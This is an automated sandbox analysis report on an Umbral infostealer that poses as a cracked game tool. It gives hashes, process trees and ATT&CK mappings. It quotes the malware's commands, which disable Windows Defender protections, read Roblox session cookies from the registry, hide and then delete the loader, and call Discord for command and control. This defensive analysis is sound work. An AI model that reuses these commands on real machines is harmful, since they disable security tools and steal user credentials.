umbral | 8d760423938a7e6e1c810a6138054850965844facb0f8cb2cc4378de140a5f23

Analysis

max time kernel
56s
max time network
57s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
28/06/2024, 21:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

REDengine-5M-CRACKED
Size

233KB
MD5

a89eebdba744f35fd505a73acdf3152b
SHA1

27246a2e954b29bb6940cf498541c53c67946be9
SHA256

8d760423938a7e6e1c810a6138054850965844facb0f8cb2cc4378de140a5f23
SHA512

dd319618d65096753c6290f38160e2811c70694702c083ab1f204554d100d896d0b0f611ef30a257329d862dd6b0aa73f131f4c2b7041e80b8689e47773a2a52
SSDEEP

6144:WhoQC2n9dH5M2vkm0y3Cl3pId9Rf9UvZJT3CqbMrhryfQNRPaCieMjAkvCJv1ViV:2oQC2n9dH5M2vkm0y3Cl3pId9Rf9UvZx

Score

10^/10

umbral execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000100000002aac6-245.dat	family_umbral
behavioral1/memory/2276-291-0x000001C44A520000-0x000001C44A566000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2528	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	loader.exe

Executes dropped EXE 1 IoCs

pid	Process
2276	loader.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
31	discord.com
32	raw.githubusercontent.com
36	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
31	ip-api.com

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1724	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133640827353343026"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HjSLb.scr\:Zone.Identifier:$DATA	loader.exe
File opened for modification	C:\Users\Admin\Downloads\loader.exe:Zone.Identifier	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
920	PING.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1576	chrome.exe
1576	chrome.exe
2276	loader.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
1788	powershell.exe
1788	powershell.exe
1788	powershell.exe
3408	powershell.exe
3408	powershell.exe
3408	powershell.exe
3632	powershell.exe
3632	powershell.exe
3632	powershell.exe
5024	powershell.exe
5024	powershell.exe
5024	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeDebugPrivilege	2276	loader.exe
Token: SeIncreaseQuotaPrivilege	2688	wmic.exe
Token: SeSecurityPrivilege	2688	wmic.exe
Token: SeTakeOwnershipPrivilege	2688	wmic.exe

Suspicious use of FindShellTrayWindow 60 IoCs

pid	Process
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1576 wrote to memory of 4100	1576	chrome.exe	79
PID 1576 wrote to memory of 4100	1576	chrome.exe	79
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 5088	1576	chrome.exe	80
PID 1576 wrote to memory of 1056	1576	chrome.exe	81
PID 1576 wrote to memory of 1056	1576	chrome.exe	81
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82
PID 1576 wrote to memory of 4612	1576	chrome.exe	82

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3020	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\REDengine-5M-CRACKED
1⤵
PID:1804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd97d0ab58,0x7ffd97d0ab68,0x7ffd97d0ab78
  2⤵
  PID:4100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1556 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:2
  2⤵
  PID:5088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:1056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1760 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:4612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3068 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:1
  2⤵
  PID:2812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:1
  2⤵
  PID:672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4220 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:1
  2⤵
  PID:2072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4352 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:3800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4528 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:4504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:3728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4672 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:3908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4144 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:1644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4896 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:1
  2⤵
  PID:2468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4552 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:4912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5296 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:1496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5308 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  - NTFS ADS
  PID:408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5044 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:5004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5384 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:4496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:1900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 --field-trial-handle=1752,i,11108595880844286599,4357259828091598506,131072 /prefetch:8
  2⤵
  PID:796
- C:\Users\Admin\Downloads\loader.exe
  "C:\Users\Admin\Downloads\loader.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2276
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2688
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Downloads\loader.exe"
    3⤵
    - Views/modifies file attributes
    PID:3020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\loader.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1788
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3632
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:1580
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:3796
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5024
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1724
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\loader.exe" && pause
    3⤵
    PID:2688
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:920

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3912

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
fa257d49b78ff3a5bfaa925f3a146a2c

SHA1
7f6715fba063b74ec2f03733f15fde77a7b6f6f8

SHA256
043dd7773556b48f2b4c98e65eea8d4dc4566cbbd60eeb6a90d4e5b87ea089c6

SHA512
b655679e8f360182b127b13137dab73bf9e6b1d65d1a1d42a16432c09713b0eea8c4cb8e51fd696d10ff1abbc14bae07879c7518727376d95896578477dd1844

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

Filesize
14KB

MD5
e10d449ec2b49d5a3935be7e4e8cb9ef

SHA1
2349916dbc59a641f5781cff3732f750e47bdba4

SHA256
a6cde81ca7f6dd50ee2ee4a56223b1d67131cccd57f3829d01a367c34004c464

SHA512
84ab2f7126d5f62ff0e7c528203f6ba2167ffa16cefc93f68eb2fa666994897603f8e42ca26e92bd629943f154d98a7c6d47025ce29bd3223829dedc42975ed9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
f910dc056fca1a904c13fd6f417fa3ba

SHA1
222ed714011684fdbb57dadab00d312c7e7f3a30

SHA256
b7d03e2c2113c088a1d7a22e5b58d04589e8fed8a8143be3721c950604eea6eb

SHA512
6ad3016e5943ca41bfd22f8f17c420ee30bfcfc183d99e12c27691feb6119040ca85b3a80f95bcdba3782e6f9701340fa1213e7a28a005fa0a18e417f7f1d93f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
5e1d7b000a9b1fea695780ba4c308ef3

SHA1
eb828d300493774019d298171c50ae1edaa63e35

SHA256
50c8fb8e7a7b71e2046f4e8b2f6fd2bcc13af6e58f8992872376341285a0528d

SHA512
fcb0ece4e2d7fa369670b03a6ff5fbea14072da7d5876c1f00c94c48a29800810e9ca87e6d6243b6142b58645020fd48177d31ae798bbd5cf711e22a526afc81

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
42d39d551d22fa4b60246e35100a981f

SHA1
10620faeee9790514b55f031726ad4a7723e2b02

SHA256
17949275683fba6c47df945b78332b618bfff2fc6a383e8bf0dadff194fad300

SHA512
60fb5686eb63cb39d34035357120d080828aee2d964111933f1b484be985f47a5f9d8662c0981a91eb58682a5c9341a575e3ba711ba656bc30b6fab03ac172c2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
f5e5b5d3c9240907330fe02965bd7a5a

SHA1
4f2728a121476712daa5237b4596d24a84ba3edc

SHA256
15bc66fc9e4e3905a889e34daec2959fff8270f6cae47adcf047ffb285a99de2

SHA512
e4baa8732b77b94a551ed895902871f6ea4a2e3e35d8e2ba70477456e54ba0efb90c0c3932ae9cf0208b2b468b935ce435d3a55574a442d6d307902fe964a9ab

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
76d0b76452757fcc56d5246f6096eca1

SHA1
26d3ab7bfe7a4c74e849a773e425ce65359b0335

SHA256
b8d572fe5dda1579e65d8d40a68cac71e627fab7f31984a396dd3b40ccc802aa

SHA512
2dea0014a56cf8be0d172d6a732e199592de7be7c3757c0bd9ff1769893d30df1f83a6c350c3236d98b3fef24c3d7da5f46173221a32e79cee2ae2aad1ec985c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

